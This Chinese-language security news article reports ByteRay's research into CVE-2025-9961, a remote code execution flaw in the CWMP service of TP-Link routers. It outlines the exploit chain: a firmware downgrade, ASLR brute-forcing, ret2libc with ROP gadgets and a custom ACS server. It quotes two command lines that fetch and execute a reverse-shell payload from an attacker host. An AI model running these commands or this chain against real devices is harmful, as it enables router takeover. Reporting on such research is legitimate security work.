FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

图片来源：ByteRay

网络安全研究团队ByteRay近日发布了对CVE-2025-9961漏洞的详细分析报告。该漏洞存在于TP-Link路由器的CWMP（CPE广域网管理协议）服务中，攻击者可利用该漏洞在受影响设备上实现远程代码执行（RCE）。

技术分析突破多重防护机制

研究报告揭示了该漏洞利用的技术复杂性，研究人员需要克服ASLR（地址空间布局随机化）和有效载荷传输限制等防护措施。ByteRay团队表示，他们的研究需要"直接与系统交互以监控日志、检查配置文件并设置GDB调试器"。团队没有使用UART接口，而是通过已知漏洞CVE-2023-1389降级固件，从而获得研究CVE-2025-9961的必要访问权限。

虽然设备启用了NX（不可执行内存）和Partial RELRO（部分重定位只读）防护，但缺乏栈保护（stack canaries）和位置无关可执行文件（PIE）防护留下了可利用的缺口。报告特别指出："栈：10位固定，10位可变，12位随机"，这凸显了研究人员需要克服的ASLR熵值挑战。

自定义ACS服务器实现精准攻击

研究团队最初尝试使用GenieACS平台投递有效载荷，但发现该平台无法可靠传输0x00-0xFF的全部字节范围。研究人员表示："这一限制迫使我们采用新方案——搭建自定义ACS服务器！"通过自建ACS服务器，ByteRay成功复现了CWMP协议步骤，并通过SetParameterValues请求投递任意有效载荷。

由于无法获取地址泄露信息，漏洞利用需要暴力破解基地址。ByteRay解释："暴力破解带来了新挑战——如果猜测的基地址错误，CWMP服务会崩溃（SIGSEGV）。但由于我们已经通过TP-Link网页面板获得访问权限，可以随时重启服务。"

完整攻击链实现反向Shell

尽管存在不稳定性，团队仍成功实施了ret2libc攻击，通过精心选择的ROP小工具调用libc库中的system()函数。攻击的最后阶段涉及投递恶意的ARM32 ELF反向Shell。研究人员使用msfvenom生成有效载荷，并通过特制的curl命令进行投递：

buf+= b"curl http://192.168.0.59:8000/show | sh"

托管在攻击者服务器上的show文件会指示设备下载、修改权限并执行后门程序：

wget http://[attacker]:8000/app -O /tmp/app && chmod +x /tmp/app && /tmp/app

最终成功获取完整功能的反向Shell，证实CVE-2025-9961漏洞可在实际环境中被利用。ByteRay强调，该研究和PoC测试仅用于安全研究目的，完整漏洞利用代码已在GitHub平台公开。

参考来源：

CVE-2025-9961: TP-Link Router Flaw Could Be Exploited for RCE, PoC Released

本文为 独立观点，未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件，请联系 FreeBuf 客服小蜜蜂（微信：freebee1024）